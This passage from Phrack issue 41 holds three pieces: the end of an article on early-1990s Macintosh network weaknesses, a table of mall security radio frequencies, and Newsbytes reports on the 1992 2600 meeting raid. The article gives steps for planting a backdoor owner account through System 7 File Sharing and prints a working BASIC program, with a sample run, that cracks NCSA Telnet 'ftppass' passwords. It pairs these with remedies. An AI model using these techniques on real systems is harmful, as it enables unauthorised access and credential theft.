  4329. method #1 to extract a username/password combination from the Prep file and use
  4330. that password to gain entrance to the VAX.
  4331.  
  4332. HOW TO SOLVE:  Disallow interactive logins on the VAX-side of the account and
  4333. disable or repassword all "default" accounts.  If your version of
  4334. VAX/AppleShare requires an interactive login, have a "special" program be run
  4335. whenever the user logs in, recording the date, time, and origin of login before
  4336. disconnecting.
  4337.  
  4338.  
  4339. SYSTEM 7 FILE SHARING
  4340. ~~~~~~ ~ ~~~~ ~~~~~~~
  4341. (4) With the advent of System 7.0 and "File Sharing," many users simply put
  4342. their machines "on the net" without taking proper measures to disallow
  4343. unauthorized access to their machine.  Several people turn Sharing on while
  4344. their drive is selected, unwittingly allowing others to read, write, copy,
  4345. delete, or modify the information on the drive.  Oddly enough, by default, the
  4346. "Trash" folder is locked out, while the System Folder is, by default, left wide
  4347. open.  A major oversight on Apple's part...  I suppose it was to discourage the
  4348. perceived threat of "digital dumpster diving" ...?  Even I cannot fathom that
  4349. one.
  4350.  
  4351. * Many times the "System Folder" is left unprotected, meaning various system
  4352. resources can be copied or modified.  One can leech the AppleTalk Remote Access
  4353. files, any Timbuk2 or Timbuk2/Remote programs, etc. and use them to further
  4354. penetration.
  4355.  
  4356. * The "Users & Groups" file can be copied, then modified "at home" by a user
  4357. running 7.0 [or by the attacking machine, if it is running 7.0] -- adding
  4358. another "owner" account, for instance, to act as a "back door" in the event
  4359. guest privileges are locked out by a wiser individual.
  4360.  
  4361. * The integrity of important files can be challenged; the System file can have
  4362. resources moved in and out of it by the attacking computer -- one of these
  4363. resources could be a virus, a Trojan horse, or a really stupid font [like New
  4364. York -- ugh!].
  4365.  
  4366. * The disk is usually populated by copyrighted software; one could easily make
  4367. pirated copies of that software.
  4368.  
  4369. * The disk may be home to personal or otherwise "private" files -- files that
  4370. can be read, copied, deleted, or even modified.  There was an instance in which
  4371. a file on a shared folder was found to contain user names and passwords to a
  4372. UNIX box on the campus network... incredibly foolish.  Fortunately, the proper
  4373. persons were informed and the files were moved to a [presumably] safer
  4374. location.
  4375.  
  4376. * The attacker could have a malicious streak and choose to delete all that he
  4377. sees.
  4378.  
  4379. HOW TO SOLVE:  Take a giant wooden plank and soundly whack all offending users.
  4380. Tell them of the intelligent way to use filesharing, and inform them that
  4381. *anyone* can go in and read their resume, love notes, financial info, erotic
  4382. poetry, etc.. that usually gets their attention. Tell them to, instead of
  4383. sharing the entire hard drive, create a folder and entitle it "Shares" or
  4384. something appropriately witty; then select the folder and go to "Sharing..."
  4385. To further security, disallow the <Any User> (Guest) logins.  To better keep
  4386. track of who's using the Macintosh, keep the "File Sharing Monitor" open or get
  4387. a program like NokNok which notifies you when someone is using your Mac.
  4388.  
  4389.  
  4390. NCSA TELNET
  4391. ~~~~ ~~~~~~
  4392. 5) The NCSA Telnet application allows a user to use his or her Mac as a telnet
  4393. client and wander around the Internet.  NCSA Telnet also handles incoming FTP
  4394. requests.  While this FTP function is easily disabled, many users keep it on
  4395. because they either use it regularly or don't even know it exists.
  4396.  
  4397. * Anyone with a valid username/password can log in to the Mac via FTP and then
  4398. change to the "root" directory and perform the normal FTP functions.. both send
  4399. and receive.  This means that *every* file on the Mac can be accessed from
  4400. *anywhere* on the Internet.  It should be noted that NCSA Telnet does not log
  4401. the "who & where" information, meaning there is no log of who used the machine,
  4402. meaning there is no way for an intruder to be "caught."
  4403.  
  4404. * The file "ftppass" contains the list of users allowed to use FTP on that
  4405. Macintosh.  If, by using one of the methods mentioned above, someone is able to
  4406. access it, it is easily cracked as it has a rather pathetic encryption scheme:
  4407. the data fork contains the user's name, a colon, and then an encrypted
  4408. password.  The password is easily decrypted; unless it is the entire 10
  4409. characters, the last few characters are in order.  That is, the next ASCII code
  4410. is 1 + the previous, etc.  Observe this from my "ftppass" file:
  4411.  
  4412. sample:ucetcr&'()
  4413.  
  4414. The first part, "sample," is the user's name.  The colon is the basic UNIX-like
  4415. delimiter, the rest is the password.  The "real" part of the password is the
  4416. characters "ucetcr" ... the remaining "&'()" are just spaces... how do you
  4417. tell?  It's in ASCII order.  Look up "&" on an ASCII chart and "'" will follow,
  4418. then "(" then ")" .. you get the idea.
  4419.  
  4420. This password can be discovered by short program XORing the encrypted
  4421. characters with a number between 0 and 255.  The program can either a) dump all
  4422. XOR results or b) if the password is not the maximum length, the program can
  4423. simply scan for a "space" [ASCII 032 decimal] in the password and print it.
  4424. The following "cracking" program is written in BASIC [hey, does anyone use that
  4425. any more?] and will allow you to decrypt the passwords.  If you can tell that
  4426. the password has spaces at the end, you can go ahead and delete line 110.
  4427. Otherwise, leave that line in and use your brain [remember your brain?] to
  4428. determine if the encrypted goop is a "real" word or just goop.
  4429.  
  4430. 5 REM "ftppass" brute-force hacker
  4431. 10 INPUT "Encrypted password:";I$
  4432. 20 FOR X=1 TO 255
  4433. 30 FOR Y=1 TO LEN(I$)
  4434. 40 Y$=MID$(I$,Y,1)
  4435. 50 YA=ASC(Y$)
  4436. 60 N=X XOR YA
  4437. 70 IF N=32 THEN F=1
  4438. 80 N$=N$+CHR$(N)
  4439. 90 NEXT Y
  4440. 100 IF F THEN ?"Possible password:"N$
  4441. 110 ?I$" 'encrypts' to "N$: REM U can delete this line if len<10
  4442. 120 N$="":F=0
  4443. 130 NEXT X
  4444. 140 ?"Finished."
  4445.  
  4446. Sample run:  [with line 110 deleted]
  4447.  
  4448. Encrypted password:ucetcr&'()        [gotta type the whole thing]
  4449. Possible password:secret !./            [boy, that was tough!]
  4450. Possible password:rdbsdu! /.
  4451. Possible password:}km|kz./ !            [etc.. just smack ^C at this point.]
  4452.  
  4453. So the password is "secret" [clever, no?]
  4454.  
  4455. It should be noted that this program is rather inelegant as I haven't really
  4456. reversed the algorithm, just written a brute-force "hacker" for it.  This is
  4457. due to laziness on my part.  If I really wanted to do this properly, I would
  4458. FTP to the NCSA anonymous site and leech the 700k+ of source and "reverse" it
  4459. thataway.  I don't feel like doing that.  I am lazy.  This program works just
  4460. dandy for me... [I suspect the encryption program uses the users' name to
  4461. encrypt it, but I don't care enough to find out.]
  4462.  
  4463. I should say that I don't wish to offend the makers of NCSA Telnet or call the
  4464. application crap.  It is, indeed, an impressive piece of work; I simply feel
  4465. that there are some aspects of it which could use improvement... if not in
  4466. terms of security, then at least allowing the user to save selections to disk!
  4467.  
  4468. BTW- I know that NCSA Telnet is also available for the IBM.  I haven't tested
  4469. these with an IBM, but if it's a "true" port, these flaws should exist under
  4470. the IBM version as well.
  4471.  
  4472.                                - = - = - = - = -
  4473.  
  4474. Well, that does it.  If you're a network coordinator and you're *still* sitting
  4475. on your skinny ass after reading this, get the hell up and fix the problems.
  4476. Don't be surprised to find someone running anonymously through your net,
  4477. leeching files and generally contributing to moral laxity ...  I've seen it
  4478. before -- it's not a pretty sight.
  4479.  
  4480. And of course, if you run a network of any sort, you must encourage users to
  4481. use different passwords on different machines and passwords that don't exist in
  4482. a dictionary [gh0ds are we sick of hearing that!].. it will work wonders for
  4483. security.  Every hacker knows the number of people who use ONE password to all
  4484. of their different accounts is unbelievably high... and they make very good use
  4485. of this oversight.
  4486.  
  4487. - = - = - = - = - = - = - = - =- = - = - = - =- = - = - = - =- = - = - = - = -
  4488.  
  4489.  
  4490.                                 ==Phrack Inc.==
  4491.  
  4492.                   Volume Four, Issue Forty-One, File 10 of 13
  4493.  
  4494.           |                                                       |
  4495.       _o  #                   Mall Cop Frequencies                #  o_
  4496.      /()\/~                                                       ~\/()\
  4497.      ~\\                        by Caligula XXI                      //~
  4498.       ||                                                             ||
  4499.       ~~                                                             ~~
  4500.  
  4501.                   THIS ONE IS DEDICATED TO THE DC 2600 MEETING
  4502.  
  4503. Living in America, one can easily and falsely assume that there really is a
  4504. Bill of Rights.  On November 6, 1992, the right to peaceably gather was
  4505. suspended.  Even though the U.S. Supreme Court ruled that shopping malls are
  4506. "public meeting places" and not private property, it doesn't make a damn bit of
  4507. difference to pigs.  So here is a little information that may help you keep an
  4508. eye on them while they are so preoccupied with us.
  4509.  
  4510. If your shopping mall is not listed below, try scanning (MHz):
  4511.  
  4512.                  151.625 to 151.955          154.515 to 154.60
  4513.                  457.5125 to 457.6125        460.65 to 462.1875
  4514.                  462.75 to 462.775           463.20 to 464.9875
  4515.                  465.65 to 467.1875          467.75 to 467.925
  4516.                  468.20 to 469.975           851.0125 to 865.9875
  4517.  
  4518. Following the shopping mall list is a list of nationwide stores and their
  4519. security frequencies.
  4520.  
  4521.  __________________________________________________________
  4522. / ST   City               Mall                   Freq. MHz \
  4523. |==========================================================|
  4524. | AK | Anchorage        | Northway Mall         | 461.775  |
  4525. | AL | Birmingham       | Century Plaza         | 464.875  |
  4526. | AL | Mobile           | Belair Mall           | 464.875  |
  4527. | AL | Montgomery       | Montgomery Mall       | 466.0625 |
  4528. | AZ | Phoenix          | Metrocenter           | 464.475  |
  4529. | AZ | Phoenix          | Paradise Valley Mall  | 464.375  |
  4530. | AZ | Tucson           | Foothills Mall        | 464.575  |
  4531. | CA | Bakersfield      | Valley Plaza Shop Cent| 154.57   |
  4532. | CA | Canoga Park      | Topanga Plaza         | 154.54   |
  4533. | CA | Los Angeles      | Century City Center   | 461.025  |
  4534. | CA | Oxnard           | Center Points Mall    | 464.475  |
  4535. | CA | San Francisco    | Embarcardero Center   | 854.8375 |
  4536. | CO | Boulder          | Crossroads Mall       | 468.7875 |
  4537. | CO | Denver           | Laksie Mall           | 464.375  |
  4538. | CT | Hartford         | Northeast Plaza       | 464.375  |
  4539. |    |                  |                       | 464.675  |
  4540. |    |                  |                       | 464.80   |
  4541. |    |                  |                       | 464.95   |
  4542. | CT | Danbury          | Fair Mall             | 464.675  |
  4543. | DC | Washington       | Montgomery Mall       | 463.25   |
  4544. | DC | Washington       | Renaissance Plaza     | 463.375  |
  4545. | FL | Jacksonville     | Gateway Mall          | 461.025  |
  4546. | FL | Miami            | South Date Plaza      | 461.675  |
  4547. | FL | Ft. Charlotte    | South Port Square     | 154.54   |
  4548. | FL | Tallahassee      | Tallahassee Mall      | 461.20   |
  4549. |    |                  |                       | 463.60   |
  4550. | FL | Tampa            | W. Shore Plaza        | 461.9125 |
  4551. | GA | Atlanta          | Piedmont Center       | 464.525  |
  4552. |    |                  |                       | 464.5875 |
  4553. | GA | Atlanta          | Peachtree Center      | 461.825  |
  4554. | HI | Pearl City       | Century Park Plaza    | 464.225  |
  4555. | IA | Des Moines       | Merel Hay Mall        | 154.54   |
  4556. |    |                  |                       | 154.57   |
  4557. | IA | West Burlington  | Southridge Mall       | 464.675  |
  4558. | IL | Springfield      | The Center            | 464.925  |
  4559. | IL | Chicago          | Ford City Center      | 464.775  |
  4560. |    |                  |                       | 464.975  |
  4561. | IL | Aurora           | Fox Valley Center     | 464.675  |
  4562. | IN | Ft. Wayne        | Glenbrook Square      | 464.575  |
  4563. |    |                  |                       | 464.875  |
  4564. | IN | Indianapolis     | Lafayette Square      | 461.025  |
  4565. | KS | Manhattan        | Manhattan Tower Center| 463.525  |
  4566. | KS | Kansas City      | Bannister Mall        | 464.575  |
  4567. |    |                  |                       | 464.675  |
  4568. | KY | Lexington        | Fayette Mall          | 462.1125 |
  4569. | KY | Louisville       | Oxmoor Center         | 464.8125 |
  4570. | LA | New Orleans      | World Trade Center    | 463.25   |
  4571. | LA | Shreveport       | Mall St. Vincent      | 464.675  |
  4572. | MA | North Attleboro  | Emerald Square Mall   | 461.725  |
  4573. | MA | Boston           | World Trade Center    | 461.9125 |
  4574. |    |                  |                       | 461.9375 |
  4575. |    |                  |                       | 461.9625 |
  4576. |    |                  |                       | 462.1625 |
  4577. |    |                  |                       | 464.80   |
  4578. | MA | Boston           | Copley Plaza          | 154.60   |
  4579. | MA | Watertown        | Arsenal Mall          | 464.95   |
  4580. | MD | Baltimore        | Eastpoint Mall        | 151.805  |
  4581. | MD | Greenbelt        | Beltway Plaza Mall    | 151.925  |
  4582. | MI | Ann Arbor        | Briarwood Mall        | 462.05   |
  4583. |    |                  |                       | 462.575  |
  4584. | MI | Detroit          | Renaissance Center    | 151.955  |
  4585. |    |                  |                       | 462.60   |
  4586. |    |                  |                       | 462.7625 |
  4587. | MI | Grand Rapids     | Woodland Center       | 464.475  |
  4588. |    |                  |                       | 464.5375 |
  4589. | MN | Rochester        | Center Place          | 464.475  |
  4590. |    |                  |                       | 464.5375 |
  4591. | MO | Kansas City      | Banister Mall         | 464.575  |
  4592. |    |                  |                       | 464.675  |
  4593. | MO | St. Louis        | Galleria              | 461.9125 |
  4594. |    |                  |                       | 462.0875 |
  4595. |    |                  |                       | 462.8625 |
  4596. | MS | Tupelo           | Mall @ Barnes Cross   | 464.60   |
  4597. | MT | Billings         | West Park Plaza       | 464.775  |
  4598. | NC | Raleigh          | North Hills Mall      | 464.575  |
  4599. | NC | Wilmington       | Independence Mall     | 464.7875 |
  4600. | ND | Great Forks      | Columbia Mall         | 463.60   |
  4601. | NE | Freendale        | Southridge Mall       | 464.525  |
  4602. | NE | North Platte     | The Mall              | 461.425  |
  4603. | NH | Newington        | Foxrun Mall           | 463.975  |
  4604. |    |                  |                       | 464.225  |
  4605. | NH | Nashua           | Pheasant Lane Mall    | 464.95   |
  4606. | NJ | Atlantic City    | Ocean One Mall        | 461.90   |
  4607. | NJ | Short Hills      | Mall @ Short Hills    | 464.825  |
  4608. | NJ | New Brunswick    | Fashion Plaza         | 464.475  |
  4609. | NV | Reno             | Park Lane Mall        | 464.05   |
  4610. | NY | Colonie          | Northway Mall         | 461.6875 |
  4611. | NY | Mineola          | Roosevelt Field       | 462.725  |
  4612. | NY | Massapequa       | Sunrise Mall          | 151.865  |
  4613. |    |                  |                       | 464.465  |
  4614. | NY | Mt. Vernon       | Cross Country Center  | 154.57   |
  4615. |    |                  |                       | 154.60   |
  4616. | NY | New York         | Gateway Plaza         | 464.825  |
  4617. | NY | Lake Grove       | Smithaven Mall        | 154.60   |
  4618. | OH | Columbus         | Northland Mall        | 463.625  |
  4619. |    |                  |                       | 464.925  |
  4620. | OH | Cleveland        | Randall Park          | 461.425  |
  4621. | OH | Youngstown       | Southern Park Mall    | 461.50   |
  4622. | OK | Broken Arrow     | Woodland Hills Mall   | 461.075  |
  4623. |    |                  |                       | 469.675  |
  4624. | OK | Oklahoma City    | North Park Mall       | 464.7875 |
  4625. | OR | Eugene           | Gateway Mall          | 461.125  |
  4626. | OR | Portland         | Washington Square Mall| 464.475  |
  4627. | PA | Media            | Granite Run Mall      | 464.325  |
  4628. | PA | Pittsburgh       | Century III           | 464.325  |
  4629. |    |                  |                       | 464.375  |
  4630. |    |                  |                       | 464.975  |
  4631. | PA | Pittsburgh       | Parkway Center Mall   | 464.6875 |
  4632. | RI | Newport          | Mall @ Newport        | 461.575  |
  4633. | SC | Columbia         | Columbia Mall         | 462.1125 |
  4634. | SC | Spartanburg      | Westgate Mall         | 151.955  |
  4635. | TN | Knoxville        | East Town Mall        | 463.3375 |
  4636. | TN | Memphis          | Mall of Memphis       | 464.975  |
  4637. | TN | Nashville        | Bellevue Center       | 464.825  |
  4638. | TX | San Antonio      | Wonderland Mall       | 467.875  |
  4639. |    |                  |                       | 469.9125 |
  4640. | TX | Dallas           | World Trade Center    | 464.375  |
  4641. |    |                  |                       | 464.875  |
  4642. | TX | Fort Worth       | Plaza Forth Worth     | 461.85   |
  4643. |    |                  |                       | 464.55   |
  4644. | TX | Houston          | West Oaks Mall        | 462.1125 |
  4645. |    |                  |                       | 464.3875 |
  4646. |    |                  |                       | 464.4875 |
  4647. | UT | Salt Lake City   | Crossroads Plaza      | 464.825  |
  4648. |    |                  |                       | 464.975  |
  4649. |    |                  |                       | 464.9875 |
  4650. | VA | Colonial Heights | Southpark Mall        | 855.5625 |
  4651. | VA | Hampton          | Coliseum Mall         | 464.30   |
  4652. | VA | Portsmouth       | Tower Mall            | 464.675  |
  4653. | WI | Milwaukee        | Southgate Mall        | 464.725  |
  4654. |    |                  |                       | 464.8875 |
  4655. | WV | Vienna           | Grand Central Mall    | 151.835  |
  4656. | WY | Cheyenne         | Frontier Mall         | 464.5125 |
  4657. \__________________________________________________________/
  4658.  
  4659.  __________________________________________________________
  4660. /                |                                         \
  4661. | J.C. Penny's   | 154.57, 154.60, 461.6125, 461.9375,     |
  4662. |                | 464.50, 464.55                          |
  4663. | K-Mart         | 154.57, 154.60, 457.5375, 457.5875,     |
  4664. |                | 461.3125,463.9125                       |
  4665. | Montgomery Ward| 467.8125                                |
  4666. | Sears          | 154.57, 454.50, 464.55                  |
  4667. | Toys R Us      | 461.7375, 461.9625, 463.7875, 464.9625  |
  4668. | Wal-Mart       | 151.625, 467.7625, 467.75, 467.775      |
  4669. |                | 467.80, 467.825, 467.85, 467.875, 467.90|
  4670. | Zayre          | 461.0125, 463.4125                      |
  4671. \________________|_________________________________________/
  4672. =========================================================================
  4673.  
  4674.  
  4675.  
  4676.                                 ==Phrack Inc.==
  4677.  
  4678.                   Volume Four, Issue Forty-One, File 11 of 13
  4679.  
  4680.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4681.               PWN                                             PWN
  4682.               PWN              Phrack World News              PWN
  4683.               PWN                                             PWN
  4684.               PWN           Issue 41 / Part 1 of 3            PWN
  4685.               PWN                                             PWN
  4686.               PWN        Compiled by Datastream Cowboy        PWN
  4687.               PWN                                             PWN
  4688.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4689.  
  4690.  
  4691.  Reports of "Raid" on 2600 Washington Meeting                  November 9, 1992
  4692.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4693.  by Barbara E. McMullen & John F. McMullen (Newsbytes)
  4694.  
  4695. WASHINGTON, D.C. -- The publisher of a well-known hacker magazine claims a
  4696. recent meeting attended by those interested in the issues his magazine raises
  4697. was disrupted by threats of arrest by security and Arlington, Virginia police
  4698. officers.
  4699.  
  4700. Eric Corley, also known as "Emmanuel Goldstein," editor and publisher of "2600
  4701. Magazine: The Hacker Quarterly," told Newsbytes that the meeting was held
  4702. November 6th at the Pentagon City Mall outside Washington, DC was disrupted and
  4703. material was confiscated in the raid.
  4704.  
  4705. 2600 Magazine promotes monthly meetings of hackers, press, and other interested
  4706. parties throughout the country.  The meetings are held in public locations on
  4707. the first Friday evening of the month and the groups often contact each other
  4708. by telephone during the meetings.
  4709.  
  4710. Corley told Newsbytes that meetings were held that evening in New York,
  4711. Washington, Philadelphia, Cambridge, St. Louis, Chicago, Los Angeles and San
  4712. Francisco.  Corley said, "While I am sure that meetings have been observed by
  4713. law enforcement agencies, this is the only time that we have been harassed.  It
  4714. is definitely a freedom of speech issue."
  4715.  
  4716. According to Craig Neidorf, who was present at the meeting and was distributing
  4717. applications for membership in Computer Professionals For Social Responsibility
  4718. (CPSR), "I saw the security officers focusing on us.  Then they started to come
  4719. toward us from a number of directions under what seemed to be the direction of
  4720. a person with a walkie-talkie on a balcony.  When they approached, I left the
  4721. group and observed the security personnel encircling the group of about 30
  4722. gatherers.  The group was mainly composed of high school and college students.
  4723. The guards demanded to search the knapsacks and bags of the gatherers.  They
  4724. confiscated material, including CPSR applications, a copy of Mondo 2000 (a
  4725. magazine), and other material."
  4726.  
  4727. He adds that the guards also confiscated film "from a person trying to take
  4728. pictures of the guards.  When a hacker called "HackRat" attempted to copy down
  4729. the names of the guards, they took his pencil and paper."
  4730.  
  4731. Neidorf continued, "I left to go outside and rejoined the group when they were
  4732. ejected from the mall.  The guards continued challenging the group and told
  4733. them that they would be arrested if they returned.  When one of the people
  4734. began to take pictures of the guards, the apparent supervisor became excited
  4735. and threatening but did not confiscate the film."
  4736.  
  4737. Neidorf also said, "I think that the raid was planned.  They hit right about
  4738. 6:00 and they identified our group as "hackers" and said that they knew that
  4739. this group met every month."
  4740.  
  4741. Neidorf's story was supported by a Washington "hacker" called "Inhuman," who
  4742. told Newsbytes, "I arrived at the meeting late and saw the group being detained
  4743. by the guards.  I walked along with the group as they were being ushered out
  4744. and when I asked a person who seemed to be in authority his name, he pointed at
  4745. a badge with his name written in script on it.  I couldn't make out the name
  4746. and, when I mentioned that to the person, he said 'If you can't read it, too
  4747. bad.'  I did read his name, 'C. Thomas,' from another badge."
  4748.  
  4749. Inhuman also told Newsbytes that he was told by a number of people that the
  4750. guards said that they were "acting on behalf of the Secret Service."  He added,
  4751. "I was also told that there were two police officers from the Arlington County
  4752. Police present but I did not see them."
  4753.  
  4754. Another attendee, Doug Luce, reports, "I also got to the DC meeting very late;
  4755. 7:45 or so.  It seemed like a coordinated harassment episode, not geared toward
  4756. busting anyone, but designed to get people riled up, and maybe not come back to
  4757. the mall."
  4758.  
  4759. Luce adds that he overheard a conversation between someone who had brought a
  4760. keyboard to sell.  The person, he said, was harassed by security forces, one of
  4761. whom said, "You aren't selling anything in my mall without a vendors permit!"
  4762.  
  4763. Possible Secret Service involvement was supported by a 19 year-old college
  4764. student known as the "Lithium Bandit," who told Newsbytes, "I got to the mall
  4765. about 6:15 and saw the group being detained by approximately 5 Arlington County
  4766. police and 5 security guards. When I walked over to see what was going on, a
  4767. security guard asked me for an ID and I refused to show it, saying that I was
  4768. about to leave.  The guard said that I couldn't leave and told me that I had to
  4769. see a police officer.  When I did, the officer demanded ID and, when I once
  4770. again refused, he informed me that I could be detained for up to 10 hours for
  4771. refusing to produce identification.  I gave in and produced my school ID which
  4772. the police gave to the security people who copied down my name and social
  4773. security number."
  4774.  
  4775. Lithium Bandit continued, "When I asked the police what was behind this action,
  4776. I was told that they couldn't answer but that 'the Secret Service is involved
  4777. and we are within our rights doing this."
  4778.  
  4779. The boy says he and others later went to the Arlington police station to get
  4780. more information and were told only that there was a report of the use of a
  4781. stolen credit card and two officers were sent to investigate.  "They later
  4782. admitted that it was 5 (officers).  While I was detained, I heard no mention of
  4783. a credit card and there was no one arrested."
  4784. Marc Rotenberg, director of CPSR's Washington office, told Newsbytes, "I have
  4785. really no details on the incident yet, but I am very concerned about the
  4786. reports. Confiscation of CPSR applications, if true, is outrageous.  I will
  4787. find out more facts on Monday."
  4788.  
  4789. Newsbytes was told by the Pentagon City Mall office that any information
  4790. concerning the action would have to come from the director of security, Al
  4791. Johnson, who was not available until Monday.  The Arlington Country Police
  4792. referred Newsbytes to a "press briefing recording" which had not been updated
  4793. since the morning before the incident.
  4794.  
  4795. Corley told Newsbytes, "There have been no reports of misbehavior by any of
  4796. these people.  They were obviously singled out because they were hackers.  It's
  4797. as if they were being singled out as an ethnic group.  I admire the way the
  4798. group responded -- in a courteous fashion.  But it is inexcusable that it
  4799. happened.  I will be at the next Washington meeting to insure that it doesn't
  4800. happen again."
  4801.  
  4802. The manager of one of New York state's largest malls provided background
  4803. information to Newsbytes on the rights of malls to police those on mall
  4804. property, saying, "The primary purpose of a mall is to sell. The interior of
  4805. the mall is private property and is subject to the regulations of the mall.
  4806. The only requirement is that the regulations be enforced in an even-handed
  4807. manner.  I do not allow political activities in my mall so I could not make an
  4808. exception for Democrats.  We do allow community groups to meet but they must
  4809. request space at least two weeks before the meeting and must have proper
  4810. insurance.  Our regulations also say that groups of more than 4 may not
  4811. congregate in the mall."
  4812.  
  4813. The spokeswoman added that mall security can ask for identification from those
  4814. who violate regulations and that they may be barred from the mall for a period
  4815. of 6 months.
  4816.  
  4817. She added, "Some people feel that mall atriums and food courts are public
  4818. space.  They are not and the industry is united on this.  If the malls were to
  4819. receive tax benefits for the common space and public service in snow removal
  4820. and the like, it could possibly be a public area but malls are taxed on the
  4821. entire space and are totally private property, subject to their own
  4822. regulations.  If a group of 20 or more congregated in my mall, they would be
  4823. asked to leave."
  4824.  
  4825. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4826.  
  4827.  Confusion About Secret Service Role In 2600 Washington Raid   November 7, 1992
  4828.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4829.  by Barbara E. McMullen & John F. McMullen (Newsbytes)
  4830.  
  4831. WASHINGTON, D.C.-- In the aftermath of an action on Friday, November 6th by
  4832. members of the Pentagon City Mall Police and police from Arlington County,
  4833. Virginia in which those attending a 2600 meeting at the mall were ordered from
  4834. the premises, conflicting stories continue to appear.
  4835.  
  4836. Attendees at the meeting have contended to Newsbytes that members of the mall
  4837. police told them that they were "acting on behalf of the Secret Service."  They
  4838. also maintain that the mall police confiscated material from knapsacks and took
  4839. film from someone attempting to photograph the action and a list of the names
  4840. of security officers that one attendee was attempting to compile.
  4841.  
  4842. Al Johnson, chief of security for the mall, denied these allegations to
  4843. Newsbytes, saying "No one said that we were acting on behalf of the Secret
  4844. Service.  We were merely enforcing our regulations.  While the group was not
  4845. disruptive, it had pulled tables together and was having a meeting in our food
  4846. court area.  The food court is for people eating and is not for meetings.  We
  4847. therefore asked the people to leave."
  4848.  
  4849. Johnson denied that security personnel took away any film or lists and further
  4850. said "We did not confiscate any material.  The group refused to own up to who
  4851. owned material on the tables and in the vicinity so we collected it as lost
  4852. material.  If it turns out that anything did belong to any of those people,
  4853. they are welcome to come in and, after making proper identification, take the
  4854. material."
  4855.  
  4856. In a conversation early on November 9th, Robert Rasor, Secret Service agent-in-
  4857. charge of computer crime investigations, told Newsbytes that having mall
  4858. security forces represent the Secret Service is not something that was done
  4859. and, that to his knowledge, the Secret Service had no involvement with any
  4860. Pentagon City mall actions on the previous Friday.
  4861.  
  4862. A Newsbytes call to the Arlington County police was returned by a Detective
  4863. Nuneville who said that her instructions were to refer all questions concerning
  4864. the matter to agent David Adams of the Secret Service.  She told Newsbytes that
  4865. Adams would be providing all information concerning the involvement of both the
  4866. Arlington Police and the Secret Service in the incident.
  4867.  
  4868. Adams told Newsbytes "The mall police were not acting as agents for the Secret
  4869. Service. Beyond that, I can not confirm or deny that there is an ongoing
  4870. investigation."
  4871.  
  4872. Adams also told Newsbytes that "While I cannot speak for the Arlington police,
  4873. I understand that their involvement was due to an incident unrelated to the
  4874. investigation."
  4875.  
  4876. Marc Rotenberg, director of the Washington office of Computer Professionals for
  4877. Social Responsibility (CPSR), told Newsbytes "CPSR has reason to believe that
  4878. the detention of people at the Pentagon City Mall last Friday was undertaken at
  4879. the behest of the Secret Service, which is a federal agency.  If that is the
  4880. case, then there was an illegal search of people at the mall.  There was no
  4881. warrant and no indication of probable illegal activity.  This raises
  4882. constitutional issues. We have undertaken the filing of a Freedom of
  4883. Information Act (FOIA) request to determine the scope, involvement and purpose
  4884. of the Secret Service in this action."
  4885.  
  4886. 2600 meetings are held on the evening of the first Friday of each month in
  4887. public places and malls in New York City, Washington, Philadelphia, Cambridge,
  4888. St. Louis, Chicago, Los Angeles and San Francisco.  They are promoted by 2600
  4889. Magazine: The Hacker Quarterly and are attended by a variety of persons
  4890. interested in telecommunications and so-called "hacker issues".  The New York
  4891. meeting, the oldest of its kind, is regularly attended by Eric Corley a/k/a
  4892. Emmanuel Goldstein, editor and publisher of 2600, hackers, journalists,
  4893. corporate communications professionals and other interested parties.  It is
  4894. known to have been the subject of surveillance at various times by law
  4895. enforcement agencies conducting investigations into allegations of computer
  4896. crime.
  4897.  
  4898. Corley told Newsbytes "While I'm sure that meetings have been observed by law
  4899. enforcement agencies, this is the only time that we have been harassed.  It's
  4900. definitely a freedom of speech issue." Corley also that he plans to be at the
  4901. December meeting in Washington "to insure that it doesn't happen again."
  4902.  
  4903. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4904.  
  4905.  Conflicting Stories In 2600 Raid; CRSR Files FOIA            November 11, 1992
  4906.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4907.  by Barbara E. McMullen & John F. McMullen (Newsbytes)
  4908.  
  4909. WASHINGTON, D.C. -- In the on-going investigation of possible Secret Service
  4910. involvement in the Friday, November 6th ejection of attendees at a "2600
  4911. meeting" from the premises of the Pentagon City Mall, diametrically opposed
  4912. statements have come from the same source.
  4913.  
  4914. Al Johnson, chief of security for the Pentagon City Mall told Newsbytes on
  4915. Monday, November 9th "No one said that we were acting on behalf of the Secret
  4916. Service.  We were merely enforcing our regulations.  While the group was not
  4917. disruptive, it had pulled tables together and was having a meeting in our food
  4918. court area.  The food court is for people eating and is not for meetings.  We
  4919. therefore asked the people to leave."
  4920.  
  4921. On the same day, Johnson was quoted was quoted in a Communications Daily
  4922. article by Brock Meeks as saying "As far as I'm concerned, we're out of this.
  4923. The Secret Service, the FBI, they're the ones that ramrodded this whole thing."
  4924.  
  4925. Newsbytes contacted Meeks to discuss the discrepancies in the stories and were
  4926. informed that the conversation with Johnson had been taped and was available
  4927. for review.  The Newsbytes reporter listened to the tape (and reviewed a
  4928. transcript).  On the tape, Johnson was clearly heard to make the statement
  4929. quoted by Meeks.
  4930.  
  4931. He also said "maybe you outta call the Secret Service, they're handling this
  4932. whole thing.  We, we were just here", and, in response to a Meeks question
  4933. about a Secret Service contact, "Ah.. you know, I don't have a contact person.
  4934. These people were working on their own, undercover, we never got any names, but
  4935. they definitely, we saw identification, they were here."
  4936.  
  4937. Newsbytes contacted Johnson again on the morning of Wednesday, November 11 and
  4938. asked him once again whether there was any Secret Service involvement in the
  4939. action. Johnson said "No, I told you that they were not involved."  When it was
  4940. mentioned that there was a story in Communications Daily, quoting him to the
  4941. contrary, Johnson said "I never told Meeks that.  There was no Secret Service
  4942. involvement"
  4943.  
  4944. Informed of the possible existence of a tape quoting him to the contrary.
  4945. Johnson said "Meeks taped me? He can't do that.  I'll show him that I'm not
  4946. fooling around.  I'll have him arrested."
  4947.  
  4948. Johnson also said "He asked me if the Secret Service was involved; I just told
  4949. him that, if he thought they were, he should call them and ask them."
  4950.  
  4951. Then Johnson again told Newsbytes that the incident was "just a mall problem.
